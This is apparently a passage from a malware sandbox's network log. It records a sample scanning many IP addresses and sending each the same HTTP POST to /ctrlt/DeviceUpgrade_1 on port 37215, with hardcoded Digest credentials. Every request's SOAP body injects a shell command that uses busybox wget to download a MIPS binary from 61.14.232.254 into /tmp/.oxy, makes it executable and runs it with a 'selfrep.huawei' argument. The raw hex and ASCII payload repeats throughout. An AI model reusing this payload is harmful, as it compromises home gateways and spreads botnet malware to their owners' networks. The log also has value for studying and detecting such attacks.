3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2324192.168.2.1333642197.91.230.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784136057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2325192.168.2.1351450157.23.79.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784317970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2326192.168.2.1339022137.116.204.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784334898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2327192.168.2.1343694197.119.195.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784369946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2328192.168.2.1338336157.9.232.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784509897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2329192.168.2.135674059.211.85.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784529924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2330192.168.2.1344000157.126.107.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784544945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2331192.168.2.135462023.212.94.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784570932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2332192.168.2.1353546197.64.3.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784584045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2333192.168.2.134665225.121.153.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784617901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2334192.168.2.1359050197.22.48.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784634113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
